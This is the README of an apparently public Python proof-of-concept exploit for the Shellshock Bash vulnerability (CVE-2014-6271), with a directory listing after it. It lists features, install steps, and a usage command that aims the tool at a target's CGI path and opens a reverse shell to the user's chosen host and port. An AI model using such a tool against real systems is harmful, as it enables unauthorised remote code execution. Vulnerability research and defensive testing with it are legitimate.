CVE-2014-6271(RCE) poc Exploit# 🚨 Shellshock RCE Exploit (CVE-2014-6271)
This is a Python exploit for the [Shellshock vulnerability (CVE-2014-6271)](https://nvd.nist.gov/vuln/detail/CVE-2014-6271), which affects **GNU Bash**. The exploit targets **CGI scripts** on vulnerable web servers and establishes a **reverse shell** to the attacker's machine.
---
## CVE ID
> **CVE-2014-6271**
---
## Disclaimer
This tool is intended **only for educational and ethical purposes**.
---
## Features
- Exploits vulnerable CGI scripts using Shellshock
- Reverse shell handler
- Supports:
- HTTP & HTTPS
- Custom CGI paths
- proxy support
- Interactive shell on success
## CVE Information
- **CVE**: [CVE-2014-6271](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)
- **Vulnerability**: GNU Bash environment variable command injection
- **Impact**: Remote Code Execution (RCE) crafted headers to CGI applications
## Requirements
- Python 3.x
- [`pwntools`](https://docs.pwntools.com/)
- [`requests`](https://docs.python-requests.org/)
## Install
```
sudo python3 -m pip install pwntools
sudo python3 -m pip install requests
git clone https://github.com/knightc0de/Shellshock_vuln_Exploit.git
cd Shellshock_vuln_Exploit/
chmod +x CVE-2014-6271.py
```
---
## Example Usage
```bash
python3 CVE-2014-6271 --rhost <target_ip> --lhost <your_ip> --lport <your_port> --pages /cgi-bin/test.cg
[4.0K] /data/pocs/4f9792e45438a12406fe60ce7d10fd3d90c00627
├── [3.3K] CVE-2014-6271.py
├── [1.0K] LICENSE
└── [1.4K] README.md
0 directories, 3 files